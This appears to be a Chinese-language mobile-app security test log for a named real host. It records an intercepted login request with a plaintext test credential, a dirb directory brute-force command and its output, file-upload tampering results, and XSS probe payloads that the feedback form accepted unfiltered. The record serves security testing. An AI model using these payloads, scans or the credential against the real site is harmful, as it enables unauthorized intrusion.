- 用户密码铭文传输:
无明文传输
POST /api/user/login?platform=ios&version=1.2.25&username=null HTTP/1.1
Host: mobile.mm.energymost.com
Content-Type: application/json
Connection: keep-alive
disco-deviceid: E20C620040AC84833D59A5DC16C6B3D1
language: zh-CN
Accept: application/json
Accept-Language: zh-cn
Content-Length: 46
Accept-Encoding: gzip, deflate
User-Agent: %E6%9C%BA%E5%99%A8%E9%A1%BE%E9%97%AE/1 CFNetwork/887 Darwin/17.0.0
{"UserName":"cncert ","Password":"cncert0406"}
- 未定义统一错误界面:
404、403、500等
- web服务器控制台暴露:
未找到控制台登录页
DIRB目录破解工具安装:http://prithak.blogspot.com/2011/08/brute-force-directory-and-files-on-web.html
执行:dirb https://mobile.mm.energymost.com wordlists/common.txt -p proxy.asec.buptnsrc.com:8001
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 31 20:32:07 2017
URL_BASE: https://mobile.mm.energymost.com/
WORDLIST_FILES: wordlists/common.txt
PROXY: proxy.asec.buptnsrc.com:8001
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://mobile.mm.energymost.com/ ----
+ https://mobile.mm.energymost.com/config (CODE:301|SIZE:185)
+ https://mobile.mm.energymost.com/log (CODE:301|SIZE:182)
+ https://mobile.mm.energymost.com/Log (CODE:301|SIZE:182)
-----------------
END_TIME: Tue Oct 31 21:45:17 2017
DOWNLOADED: 4612 - FOUND: 3
- 未授权查看风险:
不存在未授权风险
当改变一个用户请求下的”TicketTaskType:1->2“后重新发起请求,可以看到”TicketTaskType:2“下的响应内容;
当改变一个请求的username后重新发起请求:响应内容不变;
- 任意文件上传:
在cotent-type=image/jpeg情况下:
任意修改文件名后重新上传,response200
任意修改文件名后缀重新上传,response200
任意修改文件内容重新上传,response200
- 系统多处存储型XSS:
该APP存在一个意见反馈框,可以添加文字和图片,可能存在该漏洞;
检测:在反馈框输入::测试“,提交反馈;在charles中查看该请求,发现{"ContactInfo":"","Content":"测试","PictureURLs":[]}未被加密;
修改内容:”<script>alert('xss');</script>“,提交反馈;查看请求:{"ContactInfo":"","Content":"<script>alert('xss');</script>","PictureURLs":[]} ;未对<script>过滤
修改内容:”<img src='' onerror=alert('xss')>“,提交反馈;查看请求:{"ContactInfo":"","Content":"<img src='' onerror=alert('xss')>","PictureURLs":[]};未对onerrror过滤
- 登陆型XSS攻击:
<script>alert('1')</script>被过滤